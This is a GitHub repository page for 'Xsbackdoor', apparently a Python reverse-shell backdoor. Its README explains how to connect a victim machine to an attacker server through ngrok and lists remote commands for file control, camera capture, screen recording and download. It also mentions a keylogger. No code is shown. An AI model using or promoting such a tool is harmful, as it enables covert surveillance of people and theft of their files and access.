Skip to content

This script creates a simple reverse shell backdoor that allows a remote attacker to execute commands on the victim's machine. The script connects to a remote server at a specified IP address and port, then continuously listens for commands by using python

Notifications You must be signed in to change notification settings

xcyberspy/Xsbackdoor

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 

Repository files navigation

Xsbackdoor

This script creates a simple reverse shell backdoor that allows a remote attacker to execute commands on the victim's machine. The script connects to a remote server at a specified IP address and port then continuously listens for commands by using python

shields

🚀 How to Use

  1. Set Up the Connection
    Replace 'your ngrok link ip or ip or localhost in the script with your ngrok URL or localhost IP if running locally.

  2. Run the Server
    Start server.py in your terminal to establish the main server connection.

  3. Run on Target Machine
    On the target machine, execute client.py to connect it to the server.

  4. Control the Target Machine
    Use the following commands in the server terminal to interact with the target machine:

⌨️ Commands

  • File Operations

    • cd : Change directory
    • ls : List directory contents
    • mdir : Make a directory
    • rvf : Rename a file
    • rvd : Rename a directory
    • rm : Remove file or directory
    • gsize : Get file size
    • cwd : Show current working directory
  • Additional Controls

    • camera : Activate the camera to capture an image
    • screen : Capture a screen recording
    • download : Download files or folders

📜 Notes

Ensure ngrok is properly set up and both server.py and client.py are correctly configured to allow full communication between devices. Follow security best practices when using these scripts.

GUI SOON:

Xskeylogger

🛠️ Installation Steps:

1.First step

git clone https://github.com/xcyberspy/Xsbackdoor.git

2.Second step

cd Xsbackdoor

🍰 Contribution Guidelines:

Disclaimer: This code is for educational purposes only. Using backdoors for unauthorized access is illegal and unethical. Always ensure that your work complies with ethical guidelines and legal requirements

💻 Built with

Technologies used in the project:

  • python
  • vscode

💖Like my work?

Buy Me A Coffee

About

This script creates a simple reverse shell backdoor that allows a remote attacker to execute commands on the victim's machine. The script connects to a remote server at a specified IP address and port, then continuously listens for commands by using python

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages